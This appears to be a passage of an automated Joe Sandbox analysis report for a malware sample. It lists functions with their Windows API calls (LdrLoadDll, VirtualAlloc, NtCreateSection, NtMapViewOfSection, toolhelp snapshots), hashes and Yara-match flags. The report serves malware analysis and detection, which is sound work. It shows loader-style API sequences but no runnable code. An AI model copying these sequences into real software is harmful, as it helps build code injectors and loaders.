String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 5c7e32c93523182b2263357826b68d91ee3c3ba91aa9003592687bd596b49a4f
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: F8527B74A002299FDBA4DF58C984BACBBB1BF09304F1484DAE40DA7351DB34AE89DF15

Uniqueness

Uniqueness Score: -1.00%

Function 0040B58C Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0040B58F
__malloc_crt.LIBCMT ref: 0040B5BD
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040B5CA

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 49a2fb1b83c9f16244455367d635a3000e5460d0a6a54381166d35ac42f94b96
Instruction ID: 6bd679a971a5abfdfcbbb794cf7a15b017c42389b36ed99d7de3d20cbfc2f99c
Opcode Fuzzy Hash: 49a2fb1b83c9f16244455367d635a3000e5460d0a6a54381166d35ac42f94b96
Instruction Fuzzy Hash: 39F0E227901020AECA217A357C8887B1229DAC732D31544BBF452F3381FB384D8783EC

Uniqueness

Uniqueness Score: -1.00%

Function 004BD286 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 004BD2AE
Module32First.KERNEL32(00000000,00000224), ref: 004BD2CE

Memory Dump Source

Source File: 00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp, Offset: 004BC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4bc000_eieeggj.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 92c7ce21a761dfbd7b4c982de2e101a08e69d27f927999b3ea4068865b650d3e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 5DF0C2355007106FD7203BB9988DAAB76E8EF49325F1001AAE642911C0EA74EC064674

Uniqueness

Uniqueness Score: -1.00%

Function 00480E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00480223,?,?), ref: 00480E19
SetErrorMode.KERNELBASE(00000000,?,?,00480223,?,?), ref: 00480E1E

Memory Dump Source

Source File: 00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_eieeggj.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: bd9149dfa82ec171e75c52177a87668aa0e45aefdf9f1e8f5b3205ffc5ac6072
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: A8D0123114512877D7403A94DC09BDE7B1CDF05B62F008411FB0DD9180C774994047E9

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040B88F Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040B8A4

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4f7bdf0ae3454506b509a1ba1156470ae560eb85cef37f106d5e2167d2b54d3a
Instruction ID: fdd9072dd51a5094af8bbff14792c3c9a5398ed967f64e294984340f0ffe5b81
Opcode Fuzzy Hash: 4f7bdf0ae3454506b509a1ba1156470ae560eb85cef37f106d5e2167d2b54d3a
Instruction Fuzzy Hash: B4D05E32650305AAEB115F70BC09B623BDCE384795F108436F80CC6290EA74C9418648

Uniqueness

Uniqueness Score: -1.00%

Function 004277F0 Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(00436E88,00427DED), ref: 00427847

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5803b48f5093d0cfe576ee4fc49deb77592ce8e88f377515dbd01f1aa6bf59b7
Instruction ID: 173666087734f2a877f1f27f9b460ac686da6e907cf0fc04bde460f021aa7383
Opcode Fuzzy Hash: 5803b48f5093d0cfe576ee4fc49deb77592ce8e88f377515dbd01f1aa6bf59b7
Instruction Fuzzy Hash: C3F04C0D54D2C2EDD7028B68F85B7413E911723E48F5AF1A9C0880B2A3C2EE911DE77E

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

Function 004BCF45 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 004BCF96

Memory Dump Source

Source File: 00000004.00000002.2279823208.00000000004BC000.00000040.00000020.00020000.00000000.sdmp, Offset: 004BC000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4bc000_eieeggj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 8a8af96747899d2950d3697f5cf951b7b93d1a8aa1ae18506c16693801557a2c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: B0113C79A00208EFDB01DF98C985E99BBF5AF08351F058095F9489B362D375EA50EF94

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00426F00 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000000,00438678,00427D84), ref: 00426F08

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 95aeb62281ebf6d2b42ebdf5bf64688477fc6f5a305bb7d344a972c2b6fe489f
Instruction ID: 13bf4b108252158a75ec77be3b4ce55021fb3416f1f265c46b69e859f922f5fe
Opcode Fuzzy Hash: 95aeb62281ebf6d2b42ebdf5bf64688477fc6f5a305bb7d344a972c2b6fe489f
Instruction Fuzzy Hash: CCB092B0206200ABE3008B60AC05B1476F4A304202F0060A5BD00C2160CA300800EF28

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040B002 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoA.LIBCMT ref: 0040B008

Part of subcall function 004141F8: __crtGetLocaleInfoA_stat.LIBCMT ref: 0041421E

__calloc_crt.LIBCMT ref: 0040B01F

Part of subcall function 0040DEAD: Sleep.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414F5F,?), ref: 0040DED5

___crtGetLocaleInfoA.LIBCMT ref: 0040B046
__calloc_crt.LIBCMT ref: 0040B057

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: InfoLocale$___crt__calloc_crt$A_statSleep__crt
String ID:
API String ID: 3930424623-0
Opcode ID: 74bc9507c8cb048b3ebad0d035873e2c13d5b6b55a10a927cd7a68798c37a7e9
Instruction ID: da013b7990cd12b2b2fed16e94f1a8d8ec23990b9b41d735504debc0907463ae
Opcode Fuzzy Hash: 74bc9507c8cb048b3ebad0d035873e2c13d5b6b55a10a927cd7a68798c37a7e9
Instruction Fuzzy Hash: 2111B172D00161AACB306A759C85EAF7664EB40324F1404BFF829B21C1EF394D809AE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B0BE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

___crtGetLocaleInfoW.LIBCMT ref: 0040B0D3

Part of subcall function 0041404F: GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 0041406E

Strings

$kC, xrefs: 0040B0C6
,kC, xrefs: 0040B0FD

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: InfoLocale$___crt
String ID: $kC$,kC
API String ID: 286810668-2888120922
Opcode ID: 01fa62280c33394c783d4b58ad770659c06a501501e929fcd6b05787c8eb49b9
Instruction ID: 700de6bd536e460a1f440345a4f9dc536f1fd7a77c6785d7c963a20f5fb316f8
Opcode Fuzzy Hash: 01fa62280c33394c783d4b58ad770659c06a501501e929fcd6b05787c8eb49b9
Instruction Fuzzy Hash: 31F04621644182AACB101E355C218ABBB45CB89314B24547FE5A1A32C2C73EC841C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 294timeCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00427B0A
GetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00427B5B
DeviceIoControl.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 00427B9B
SetDefaultCommConfigW.KERNEL32(00431F04,?,00000000), ref: 00427BC6
CopyFileExA.KERNEL32(00431F54,00431F34,00000000,00000000,00000000,00000000), ref: 00427BDA
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00427BE1
AddAtomW.KERNEL32(00000000), ref: 00427BE8
GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 00427BF6
GetModuleHandleA.KERNEL32(00000000), ref: 00427BFD
LocalLock.KERNEL32(00000000), ref: 00427C04
GetProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00427C18
GetEnvironmentVariableW.KERNEL32(00000000,?,00000000), ref: 00427C27
QueryMemoryResourceNotification.KERNEL32(00000000,00000000), ref: 00427C38
GetConsoleAliasExesLengthW.KERNEL32 ref: 00427C72
SetTapeParameters.KERNEL32(00000000,00000000,00000000), ref: 00427C7B
IsDBCSLeadByte.KERNEL32(00000000), ref: 00427C82
GetTempFileNameW.KERNEL32(00000000,00000000,00000000,?), ref: 00427C92
MoveFileExW.KERNEL32(00000000,00000000,00000000), ref: 00427C9B
OpenWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00427CA4
GetLongPathNameW.KERNEL32(00431F80,?,00000000), ref: 00427CC5
GetCompressedFileSizeW.KERNEL32(00000000,?), ref: 00427D74
GetPrivateObjectSecurity.ADVAPI32(00000000,00000000,00000000,00000000,00000000), ref: 00427DD7
GetAtomNameA.KERNEL32(00000000,00000000,00000000), ref: 00427EA6

Strings

0, xrefs: 00427D1D
tl_, xrefs: 00427B3E
_GA, xrefs: 00427B27

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: FileName$Atom$Environment$AliasByteCommCompressedConfigConsoleControlCopyCurrentDefaultDeviceDirectoryErrorExesFreeHandleLastLeadLengthLocalLockLongMemoryModuleMoveNotificationObjectOpenParametersPathPrivateProfileQueryResourceSecuritySizeStringStringsTapeTempTimerVariableWaitable
String ID: 0$_GA$tl_
API String ID: 3429075307-1499724424
Opcode ID: c17647f3030d1a0ec08f1ea443105fe2cdf6afe921ad95357a6e98b8f81be8ef
Instruction ID: ab75bdf11779803d0565b6fc8615a4576ecaf644103de126a006e2dafc9e6c1a
Opcode Fuzzy Hash: c17647f3030d1a0ec08f1ea443105fe2cdf6afe921ad95357a6e98b8f81be8ef
Instruction Fuzzy Hash: 35A1C471945234ABD724AB61EC49FDF7B78EF09300F5011AAF609A2160DB785A84CFED

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCBF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040DD10
__copytlocinfo_nolock.LIBCMT ref: 0040DD38
__setlocale_nolock.LIBCMT ref: 0040DD4D
___removelocaleref.LIBCMT ref: 0040DD9A
_sync_legacy_variables_lk.LIBCMT ref: 0040DDD3

Strings

xLC, xrefs: 0040DDB1

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: ___removelocaleref__calloc_crt__copytlocinfo_nolock__setlocale_nolock_sync_legacy_variables_lk
String ID: xLC
API String ID: 611868054-381350105
Opcode ID: 86f6ba59649d68e1d3ab6d92d26d98441156c5ef99483970ac732cd66e0582db
Instruction ID: cd6a7387daaa6889dd3da9f550cccfc9ee4d024486082506333a7cf68692fd12
Opcode Fuzzy Hash: 86f6ba59649d68e1d3ab6d92d26d98441156c5ef99483970ac732cd66e0582db
Instruction Fuzzy Hash: 4A316171E047049BDB10BFA5D8827AE7BA0AF49318F10453FF4057A2C2CB7D9949D69D

Uniqueness

Uniqueness Score: -1.00%

